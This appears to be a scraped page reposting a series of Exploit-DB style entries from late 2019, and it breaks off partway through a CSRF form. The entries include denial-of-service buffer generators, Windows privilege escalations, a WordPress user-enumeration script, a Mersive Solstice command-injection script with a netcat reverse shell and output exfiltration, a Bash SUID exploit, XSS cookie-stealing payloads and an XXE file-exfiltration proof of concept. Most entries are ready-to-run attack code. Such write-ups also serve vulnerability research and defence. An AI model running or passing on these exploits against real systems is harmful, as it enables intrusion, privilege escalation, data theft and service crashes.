All posts by ISHACK AI BOT

  1. # Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
     # Date: 2019-11-22
     # Exploit Author: Rene Cortes S
     # Vendor Homepage: https://easy-hide-ip.com
     # Software Link: https://easy-hide-ip.com
     # Version: 5.0.0.3
     # Tested on: Windows 7 Professional Service Pack 1
     ##########################################################################

     Step to discover the unquoted Service:

     C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
     EasyRedirect    EasyRedirect    C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe    Auto

     ##########################################################################

     Service info:

     C:\Users\user>sc qc EasyRedirect
     [SC] QueryServiceConfig CORRECTO

     NOMBRE_SERVICIO: EasyRedirect
             TIPO                  : 10  WIN32_OWN_PROCESS
             TIPO_INICIO           : 2   AUTO_START
             CONTROL_ERROR         : 1   NORMAL
             NOMBRE_RUTA_BINARIO   : C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe
             GRUPO_ORDEN_CARGA     :
             ETIQUETA              : 0
             NOMBRE_MOSTRAR        : EasyRedirect
             DEPENDENCIAS          : RPCSS
             NOMBRE_INICIO_SERVICIO: LocalSystem
     ##########################################################################
  2. # Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
     # Date: 2019-11-22
     # Exploit Author: Abdelhamid Naceri
     # Vendor Homepage: www.microsoft.com
     # Tested on: Windows 10 1903
     # CVE : CVE-2019-1385

     Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability

     Class: Local Elevation of Privileges

     Description:
     This PoC exploits a vulnerability in AppXSvc; abusing this vulnerability could allow an attacker to overwrite or create a file as SYSTEM, which can result in EoP. There are 2 ways to abuse the issue.

     Steps To Reproduce:

     [1] For An Arbitrary File Creation
     1- Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup into a junction to your target directory, for example "c:\"
     2- Open PowerShell and execute the command: Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
     3- Check the directory; the file should be created now
     4- Enjoy :)

     [2] To Overwrite a File
     1- Create a temp dir in %temp%\
     2- Create a hardlink to your target file in the created temp dir
     3- Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup into a junction to your created temp dir
     4- Open PowerShell and execute the command: Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
     5- Check the file again

     Limitation:
     When 'MicrosoftEdge.exe' is created it inherits the directory permissions, which means the file would not be writable in the majority of cases. A simple example of abuse is the directory "c:\": the default ACL prevents Authenticated Users from creating files but not from modifying them, so if we abuse the vulnerability in "c:\" we will have an arbitrary file created that is also writable by a normal user.
     Also, you cannot overwrite files that are not writable by SYSTEM. I did not add a check in the PoC because if the file is not readable by the current user the check would return false even if the file is writable by SYSTEM.
     NOTE: you can also overwrite files which you cannot even read.
     For file creation, make sure the path is writable by SYSTEM, otherwise the PoC will fail. I think 99% of folders are writable by SYSTEM.

     Platform:
     This has been tested on a fully patched system (latest patch -> November 2019):
     OS Edition: Microsoft Windows 10 Home
     OS Version: 1903
     OS Version Info: 18362.418
     Additional Info: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx = 18362.1.amd64fre.19h1_release.190318-1202

     Expected result:
     The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED"

     Observed result:
     The Deployment Process is overwriting or creating an arbitrary file as "LOCAL SYSTEM"

     NOTE: It was patched on 7/11/19
  3. # Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC)
     # Discovery by: chuyreds
     # Discovery Date: 2019-11-23
     # Vendor Homepage: http://www.indusoft.com/
     # Software Link : http://www.indusoft.com/Products-Downloads
     # Tested Version: 8.1 SP1
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS: Windows 10 Pro x64 es

     # Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC)
     # Discovery by: chuyreds
     # Google Dork: [email protected]: chuyreds
     # Discovery Date: 23-11-2019
     # Vendor Homepage: http://www.indusoft.com/
     # Software Link : http://www.indusoft.com/Products-Downloads
     # Tested Version: 8.1 SP1
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS: Windows 10 Pro x64 es

     # Steps to Produce the Denial of Service:
     # 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py
     # 2.- Open "InduSoft Web Studio Edition 8.1 SP1.txt" and copy content to clipboard
     # 3.- Open InduSoft Web Studio Edition 8.1 SP1
     # 4.- On Graficos select Atributos
     # 5.- Paste Clipboard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"

     #!/usr/bin/env python

     buffer = "\x41" * 1026
     f = open("InduSoft Web Studio Edition 8.1 SP1.txt", "w")
     f.write(buffer)
     f.close()
  4. # VMware Escape Exploit

     VMware Escape Exploit before VMware WorkStation 12.5.3

     Host Target: Win10 x64
     Compiler: VS2013
     Test on VMware 12.5.2 build-4638234

     # Known issues

     * Failing heap manipulation causes a host process crash (about 50% success rate).
     * Not quite elaborate because I'm not good at doing heap "fengshui" on Windows LFH.

     # FAQ

     * Q: Error when rebooting VMware after the process crashed.
     * A: Just remove the **\*.lck** folder in your VM directory, or wait a while and have a coffee :). Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.

     ![](https://github.com/unamer/vmware_escape/raw/master/CVE-2017-4905_and_uaf/exploit.gif)

     # Reference

     * https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/

     EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47715.zip
  5. # Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)
     # Discovery by: Ivan Marmolejo
     # Discovery Date: 2019-11-25
     # Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975
     # Software Link: App Store for iOS devices
     # Tested Version: 8.20
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS: iPhone 6s iOS 13.2

     # Summary: iNetTools is a suite of network diagnose tools on iPhone and iPad. It provides essential tools such as
     # Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan.

     # Steps to Produce the Crash:
     # 1.- Run python code: iNetTools.py
     # 2.- Copy content to clipboard
     # 3.- Open "iNetTools for iOS"
     # 4.- Go to "Whois"
     # 5.- Paste Clipboard on "Domain Name"
     # 6.- Start
     # 7.- Crashed

     #!/usr/bin/env python

     buffer = "\x41" * 98
     print (buffer)
  6. #Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)
     #Exploit Author : ZwX
     #Exploit Date: 2019-11-26
     #Vendor Homepage : https://www.microsoft.com/
     #Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681
     #Tested on OS: Windows 7

     Proof of Concept (PoC):
     =======================
     1.Download and install Microsoft DirectX SDK
     2.Open the PIX for Windows tools
     3.Run the python operating script that will create a file (poc.PIXrun)
     4.Run the software "File -> Open File -> Add the file (.PIXrun) "
     5.PIX for Windows Crashed

     #!/usr/bin/python

     DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
     "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
     "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
     "\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
     "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

     poc = DoS
     file = open("poc.PIXrun","w")
     file.write(poc)
     file.close()
     print "POC Created by ZwX"
  7. #Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
     #Exploit Author : ZwX
     #Exploit Date: 2019-11-26
     #Vendor Homepage : http://www.nsauditor.com/
     #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
     #Tested on OS: Windows 7

     '''
     Proof of Concept (PoC):
     =======================
     1.Download and install SpotAuditor
     2.Run the python operating script that will create a file (poc.txt)
     3.Run the software "Tools -> Base64 Encrypted Password"
     4.Copy and paste the characters in the file (poc.txt)
     5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt'
     6.SpotAuditor Crashed
     '''

     #!/usr/bin/python

     http = "http//"
     buffer = "\x41" * 2000
     poc = http + buffer
     file = open("poc.txt","w")
     file.write(poc)
     file.close()
     print "POC Created by ZwX"
  8. # Exploit Title : Wordpress 5.3 - User Disclosure
     # Author: SajjadBnd
     # Date: 2019-11-17
     # Software Link: https://wordpress.org/download/
     # version : wp < 5.3
     # tested on : Ubuntu 18.04 / python 2.7
     # CVE: N/A

     #!/usr/bin/python
     # -*- coding: utf-8 -*-
     #

     import requests
     import os
     import re
     import json
     import sys
     import urllib3


     def clear():
         linux = 'clear'
         windows = 'cls'
         os.system([linux, windows][os.name == 'nt'])


     def Banner():
         print('''
       - Wordpress < 5.3 - User Enumeration
       - SajjadBnd
     ''')


     def Desc():
         url = raw_input('[!] Url >> ')
         vuln = url + "/wp-json/wp/v2/users/"
         while True:
             try:
                 r = requests.get(vuln, verify=False)
                 content = json.loads(r.text)
                 data(content)
             except requests.exceptions.MissingSchema:
                 vuln = "http://" + vuln


     def data(content):
         for x in content:
             name = x["name"].encode('UTF-8')
             print("======================")
             print("[+] ID : " + str(x["id"]))
             print("[+] Name : " + name)
             print("[+] User : " + x["slug"])
         sys.exit(1)


     if __name__ == '__main__':
         urllib3.disable_warnings()
         reload(sys)
         sys.setdefaultencoding('UTF8')
         clear()
         Banner()
         Desc()
  9. # Exploit Title: GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)
     # Discovery by: Ivan Marmolejo
     # Discovery Date: 2019-11-27
     # Vendor Homepage: https://apps.apple.com/mx/app/ghia-camip/id1342090963
     # Software Link: App Store for iOS devices
     # Tested Version: 1.2
     # Vulnerability Type: Denial of Service (DoS) Local
     # Tested on OS: iPhone 6s iOS 13.2.3

     # Summary: With GHIA CamIP you can view your cameras in real time; supports conventional IPC cameras,
     # cameras with alarm, video intercom and other devices.

     # Steps to Produce the Crash:
     # 1.- Run python code: GHIA.py
     # 2.- Copy content to clipboard
     # 3.- Open "GHIA CamIP for iOS"
     # 4.- Go to "Add"
     # 5.- Wireless Settings
     # 6.- Connect to the internet
     # 7.- Paste Clipboard on "Password"
     # 8.- WiFi Connection
     # 9.- Start setting
     # 10- Crashed

     #!/usr/bin/env python

     buffer = "\x41" * 33
     print (buffer)
  10. # Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
      # Google Dork: N/A
      # Date: 2016-12-23
      # Exploit Author: Alexandre Teyar
      # Vendor Homepage: https://www2.mersive.com/
      # Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
      # Versions: 2.8.0
      # Tested On: Mersive Solstice 2.8.0
      # CVE: CVE-2017-12945
      # Description : This will exploit an (authenticated) blind OS command injection
      #               vulnerability present in Solstice devices running versions
      #               of the firmware prior to 2.8.4.
      # Notes       : To get the command output (in piped-mode), a netcat listener
      #               (e.g. 'nc -lkvp <LPORT>') needs to be launched before
      #               running the exploit.
      #               To get an interactive root shell use the following syntax
      #               'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
      #               -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
      #               -e /system/bin/sh -i"'.

      #!/usr/bin/env python3

      import argparse
      import logging
      import requests
      import sys
      import time


      def parse_args():
          """ Parse and validate the command line supplied by users """
          parser = argparse.ArgumentParser(
              description="Solstice Pod Blind Command Injection"
          )
          parser.add_argument(
              "-d", "--debug",
              dest="loglevel",
              help="enable verbose debug mode",
              required=False,
              action="store_const",
              const=logging.DEBUG,
              default=logging.INFO
          )
          parser.add_argument(
              "-lh", "--lhost",
              dest="lhost",
              help="the listening address",
              required=False,
              type=str
          )
          parser.add_argument(
              "-lp", "--lport",
              dest="lport",
              help="the listening port - default 4444",
              required=False,
              default="4444",
              type=str
          )
          parser.add_argument(
              "-p", "--payload",
              dest="payload",
              help="the command to execute",
              required=True,
              type=str
          )
          parser.add_argument(
              "-pass", "--password",
              dest="password",
              help="the target administrator password",
              required=False,
              default="",
              type=str
          )
          parser.add_argument(
              "-rh", "--rhost",
              dest="rhost",
              help="the target address",
              required=True,
              type=str
          )

          return parser.parse_args()


      def main():
          try:
              args = parse_args()
              lhost = args.lhost
              lport = args.lport
              password = args.password
              rhost = args.rhost

              logging.basicConfig(
                  datefmt="%H:%M:%S",
                  format="%(asctime)s: %(levelname)-8s %(message)s",
                  handlers=[logging.StreamHandler()],
                  level=args.loglevel
              )

              # Redirect stdout and stderr to <FILE>
              # only when the exploit is launched in piped mode
              if lhost and lport:
                  payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1"
                  logging.info(
                      "attacker listening address: {}:{}".format(lhost, lport)
                  )
              else:
                  payload = args.payload

              logging.info("solstice pod address: {}".format(rhost))

              if password:
                  logging.info(
                      "solstice pod administrator password: {}".format(password)
                  )

              # Send the payload to be executed
              logging.info("sending the payload...")
              send_payload(rhost, password, payload)

              # Send the results of the payload execution to the attacker
              # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE>
              if lhost and lport:
                  payload = (
                      "busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
                          lhost, lport
                      )
                  )
                  logging.info("retrieving the results...")
                  send_payload(rhost, password, payload)

                  # Erase exploitation traces
                  payload = "rm -f /data/local/tmp/rce.tmp"
                  logging.info("erasing exploitation traces...")
                  send_payload(rhost, password, payload)

          except KeyboardInterrupt:
              logging.warning("'CTRL+C' pressed, exiting...")
              sys.exit(0)


      def send_payload(rhost, password, payload):
          URL = "http://{}/Config/service/saveData".format(rhost)
          headers = {
              "Content-Type": "application/json",
              "X-Requested-With": "XMLHttpRequest",
              "Referer": "http://{}/Config/config.html".format(rhost)
          }
          data = {
              "m_networkCuration": {
                  "ethernet": {
                      "dhcp": False,
                      "staticIP": "; {}".format(payload),
                      "gateway": "",
                      "prefixLength": 24,
                      "dns1": "",
                      "dns2": ""
                  }
              },
              "password": "{}".format(password)
          }

          # Debugging using the BurpSuite
          # proxies = {
          #     'http': 'http://127.0.0.1:8080',
          #     'https': 'https://127.0.0.1:8080'
          # }

          try:
              logging.info("{}".format(payload))
              response = requests.post(
                  URL,
                  headers=headers,
                  # proxies=proxies,
                  json=data
              )
              logging.debug(
                  "{}".format(response.json())
              )
              # Wait for the command to be executed
              time.sleep(2)
          except requests.exceptions.RequestException as ex:
              logging.error("{}".format(ex))
              sys.exit(0)


      if __name__ == "__main__":
          main()
  11. # Exploit Title: Online Inventory Manager 3.2 - Persistent Cross-Site Scripting
      # Date: 2019-11-29
      # Exploit Author: Cemal Cihad ÇİFTÇİ
      # Vendor Homepage: https://bigprof.com
      # Software Link : https://bigprof.com/appgini/applications/online-inventory-manager
      # Software : Online Inventory Manager
      # Version : 3.2
      # Vulnerability Type : Cross-site Scripting
      # Vulnerability : Stored XSS
      # Tested on: Windows 10 Pro

      # Stored XSS has been discovered in the Online Inventory Manager created by bigprof/AppGini,
      # in the editgroups section. In the editgroups section
      # (http://localhost/inventory/admin/pageEditGroup.php?groupID=1).

      # Payload I used: "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>"

      # POC: http://localhost/inventory/admin/pageViewGroups.php In this
      # url you can edit the group information by pressing on the group name. After the edit page opens
      # you can enter your payload into the description field. After going back to
      # the groups page you will see your JavaScript code run.

      # This vulnerability also exists while you are creating a new group.
  12. #Exploit Title: SpotAuditor 5.3.2 - 'Key' Denial of Service
      #Exploit Author : ZwX
      #Exploit Date: 2019-11-28
      #Vendor Homepage : http://www.nsauditor.com/
      #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
      #Tested on OS: Windows 7
      #Social: twitter.com/ZwX2a

      '''
      Proof of Concept (PoC):
      =======================
      1.Download and install SpotAuditor
      2.Run the python operating script that will create a file (poc.txt)
      3.Run the software "Register -> Enter Registration Code"
      4.Copy and paste the characters in the file (poc.txt)
      5.Paste the characters in the field 'Key' and click on 'Ok'
      6.SpotAuditor Crashed
      '''

      #!/usr/bin/python

      http = "http//"
      buffer = "\x41" * 2000
      poc = http + buffer
      file = open("poc.txt","w")
      file.write(poc)
      file.close()
      print "POC Created by ZwX"
  13. # Exploit Title: TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path
      # Date: 2019-11-28
      # Exploit Author: Cristian Ayala G
      # Vendor Homepage: https://tenaxsoft.com/index.html
      # Software Link: https://tenaxsoft.com/descargas.html
      # Version: 6.4.131
      # Tested on: Windows 10 Pro x64
      ##########################################################################

      # Step to discover the unquoted Service:

      C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr -i "auto" | findstr -i -v "C:\Windows\\ | findstr """
      CCSrvProxy                      CCSrvProxy                 C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe          Auto
      Control de impresiones Tenax    ControldeImpresiones       C:\Program Files (x86)\TenaxSoft\CyberPlanet\TenaxService64.exe    Auto

      ##########################################################################

      # Service info:

      C:\Users\user>sc qc CCSrvProxy
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: CCSrvProxy
              TIPO                  : 10  WIN32_OWN_PROCESS
              TIPO_INICIO           : 2   AUTO_START
              CONTROL_ERROR         : 1   NORMAL
              NOMBRE_RUTA_BINARIO   : C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe
              GRUPO_ORDEN_CARGA     :
              ETIQUETA              : 0
              NOMBRE_MOSTRAR        : CCSrvProxy
              DEPENDENCIAS          : Spooler
              NOMBRE_INICIO_SERVICIO: LocalSystem
      ##########################################################################
  14. # Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
      # Discovery by: SajjadBnd
      # Date: 2019-11-30
      # Vendor Homepage: http://www.nsauditor.com
      # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
      # Tested Version: 3.1.8.0
      # Vulnerability Type: Denial of Service (DoS) Local
      # Tested on OS: Windows 10 - Pro

      # About App
      # Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
      # and to provide security alerts. Nsauditor network auditor checks the enterprise network for all potential methods that
      # a hacker might use to attack it and creates a report of the potential problems that were found. Nsauditor network auditing
      # software significantly reduces the total cost of network management in enterprise environments by enabling
      # IT personnel and systems administrators to gather a wide range of information from all the computers in the network without
      # installing server-side applications on these computers, and creates a report of the potential problems that were found.

      # PoC
      # 1.Run the python script, it will create a new file "dos.txt"
      # 2.Run Nsauditor and click on "Register -> Enter Registration Code"
      # 3.Paste the content of dos.txt into the field 'Name'
      # 4.Click 'Ok'
      # 5.Crashed ;)

      #!/usr/bin/env python

      buffer = "\x41" * 1000
      try:
          f = open("dos.txt", "w")
          print "[+] Creating %s bytes DOS payload.." % len(buffer)
          f.write(buffer)
          f.close()
          print "[+] File created!"
      except:
          print "File cannot be created"
  15. # Exploit Title : Bash 5.0 Patch 11 - SUID Priv Drop Exploit
      # Date : 2019-11-29
      # Original Author: Ian Pudney , Chet Ramey
      # Exploit Author : Mohin Paramasivam (Shad0wQu35t)
      # Version : < Bash 5.0 Patch 11
      # Tested on Linux
      # Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash
      # CVE : 2019-18276
      # CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8
      # Exploit Demo POC : https://youtu.be/Dbwvzbb38W0

      Description :

      An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected.

      #!/bin/bash

      #Terminal Color Codes
      RED='\033[0;31m'
      GREEN='\033[0;32m'
      NC='\033[0m'

      #Get the Effective User ID (owner of the SUID /bin/bash binary)
      read -p "Please enter effective user id (euid) : " euid

      #Create a C file and output the exploit code
      touch pwn.c
      echo "" > pwn.c

      cat <<EOT >> pwn.c
      #include <sys/types.h>
      #include <unistd.h>
      #include <stdio.h>

      void __attribute((constructor)) initLibrary(void) {
          printf("Escape lib is initialized");
          printf("[LO] uid:%d | euid:%d%c", getuid(), geteuid());
          setuid($euid);
          printf("[LO] uid%d | euid:%d%c", getuid(), geteuid());
      }
      EOT

      echo -e "${RED}"
      echo -e "Exploit Code copied to pwn.c !\n"
      sleep 5
      echo -e "Compiling Exploit Object ! \n"
      $(which gcc ) -c -fPIC pwn.c -o pwn.o
      sleep 5
      echo -e "Compiling Exploit Shared Object ! \n"
      $(which gcc ) -shared -fPIC pwn.o -o libpwn.so
      sleep 5
      echo -e "Exploit Compiled ! \n"
      sleep 5
      echo -e "Executing Exploit :) \n"
      sleep 5

      #Execute the Shared Library
      echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n"
  16. #Exploit Title: SpotAuditor 5.3.2 - 'Name' Denial Of Service
      #Exploit Author : ZwX
      #Exploit Date: 2019-11-28
      #Vendor Homepage : http://www.nsauditor.com/
      #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
      #Tested on OS: Windows 7
      #Social: twitter.com/ZwX2a
      #contact: [email protected]

      '''
      Proof of Concept (PoC):
      =======================
      1.Download and install SpotAuditor
      2.Run the python operating script that will create a file (poc.txt)
      3.Run the software "Register -> Enter Registration Code"
      4.Copy and paste the characters in the file (poc.txt)
      5.Paste the characters in the field 'Name' and click on 'Ok'
      6.SpotAuditor Crashed
      '''

      #!/usr/bin/python

      http = "http//"
      buffer = "\x41" * 2000
      poc = http + buffer
      file = open("poc.txt","w")
      file.write(poc)
      file.close()
      print "POC Created by ZwX"
  17. # Exploit Title: Visual Studio 2008 - XML External Entity Injection
      # Discovery by: hyp3rlinx
      # Date: 2019-12-02
      # Vendor Homepage: www.microsoft.com
      # Software Link: Visual Studio 2008 Express IDE
      # Tested Version: 2008
      # CVE: N/A

      [+] Credits: John Page (aka hyp3rlinx)
      [+] Website: hyp3rlinx.altervista.org
      [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
      [+] ISR: ApparitionSec

      [Vendor]
      www.microsoft.com

      [Product]
      Visual Studio 2008 Express IDE
      vcsetup.exe
      File hash: 62f764849e8fcdf8bfbc342685641304
      Download: http://go.microsoft.com/?linkid=7729279

      [Vulnerability Type]
      XML External Entity Injection 0Day

      [CVE Reference]
      N/A

      [Security Issue]
      Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst. By opening any one of the file types listed below, it can allow remote attackers to steal files from the victim's computer, sending them to the remote attacker's server. Double click any of the following extensions and it will trigger the XXE vulnerability.

      Note, upon installation of the IDE the following file types get associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.

      [Vuln XXE file types]
      .snippet
      .i
      .s
      .asm
      .disco
      .lst
      .inc
      .srf
      .wsdl
      .rgs
      .xml

      This IDE is pretty old, I know, but it's still available for download as of this writing, therefore I release the advisory.

      [References]
      https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/

      [Exploit/POC]
      "Evil.snippet" or any of the extensions mentioned above.

      <?xml version="1.0"?>
      <!DOCTYPE knobgobslob [
      <!ENTITY % file SYSTEM "C:\Windows\system.ini">
      <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
      %dtd;]>
      <pwn>&send;</pwn>

      "payload.dtd"

      <?xml version="1.0" encoding="UTF-8"?>
      <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
      %all;

      python -m SimpleHTTPServer
      python -m http.server (Python3)

      [POC Video URL]
      https://www.youtube.com/watch?v=QOZlwzsbPrk

      [Network Access]
      Remote

      [Severity]
      High

      [Disclosure Timeline]
      Vendor Notification: 3/24/2017
      MSRC sent me link to "Definition of a Security Vulnerability"
      The product is also not supported anymore.
      December 1, 2019 : Public Disclosure

      [+] Disclaimer
      The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  18. # Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
      # Discovery by: LiquidWorm
      # Date: 2019-12-02
      # Vendor Homepage:
      # Tested Version: 6.5.33.17072501
      # CVE: N/A
      # Advisory ID: ZSL-2019-5543
      # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php

      Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities

      Vendor: Carlo Gavazzi Automation S.p.A
      Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
      Affected version: Web-app: 6.5.33.17072501
                        Web-app: 6.5.32.17062101
                        Web-app: 6.2.3.16102701
                        Web-app: 5.5.3.160421101
                        Web-app: 5.3.3.15120101
                        Release: 1.0.5.1
                        Release: 1.0.5.0
                        Release: 1.0.3.5
                        Release: 1.0.3.2

      Summary: Carlo Gavazzi is an international company that develops, manufactures and sells electrical automation components. Our products are used in industrial automation and real estate automation. Smart-house is based on a system that we have developed and produced since 1986, mainly for industrial-related installations. Our system is present in more than 150,000 installations. For a few years now, we have focused our development on smart electrical installations for home and property automation. Smart-house is currently installed in both villas and commercial properties.

      Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several GET/POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

      Tested on: Apache
                 PHP

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2019-5543
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php

      01.11.2019

      --

      Reflected XSS (GET):
      --------------------

      1. http://192.168.0.24/app/index.php?error=Waddup"><script>confirm(document.cookie)</script> (pre-auth)
      2. http://192.168.0.24/app/messagepage.php?msg=<script>confirm(document.cookie)</script> (pre-auth)
      3. http://192.168.0.24/app/detaf.php?p=0&l=50"><script>confirm(document.cookie)</script>&f=5658 (post-auth)
      4. http://192.168.0.24/app/detaf.php?p=0"><script>confirm(document.cookie)</script>&l=50&f=5658 (post-auth)
      5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction"><script>confirm(document.cookie)</script>&grpl=1 (post-auth)

      CSRF set temperature:
      ---------------------

      <html>
        <body>
          <form action="http://192.168.0.24/app/datasend.php" method="POST">
            <input type="hidden" name="IDFunction" value="3875" />
            <input type="hidden" name="favorite" value="0" />
            <input type="hidden" name="rooms" value="-1" />
